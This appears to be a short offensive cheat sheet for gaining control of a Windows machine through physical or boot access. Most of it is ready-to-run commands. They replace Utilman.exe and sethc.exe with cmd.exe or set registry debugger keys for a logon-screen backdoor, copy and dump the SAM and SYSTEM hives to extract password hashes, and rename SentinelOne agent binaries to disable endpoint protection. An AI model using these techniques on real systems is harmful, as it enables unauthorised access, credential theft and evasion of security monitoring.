USB Boot
tip
USB ports must be enabled in the BIOS. If it is not the case, check if the BIOS password protected and change the setting.
BIOS - Master passwordâ
Hibernation issuesâ
From Windows
shutdown /s /t 0
From Kali
ntfs-3g -o remove_hiberfile </dev/sdX> </path/to/mount>
Admin CLIâ
From Kaliâ
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
WIN+U
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Hit SHIFT 5 times
From an open logon sessionâ
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
SAM dumpâ
cp <...>\Windows\System32\config\SYSTEM /tmp
cp <...>\Windows\System32\config\SAM /tmp
samdump2 /tmp/SYSTEM /tmp/SAM
Kill AV/EDRâ
tip
Check the antivirus executables list.
SentinelOneâ
Change extension to .old
for the following files in the folder C:\Program Files\SentinelOne\...
AgentUI.exe
SentinelAgent.exe
SentinelCtl.exe
SentinelServicehost.exe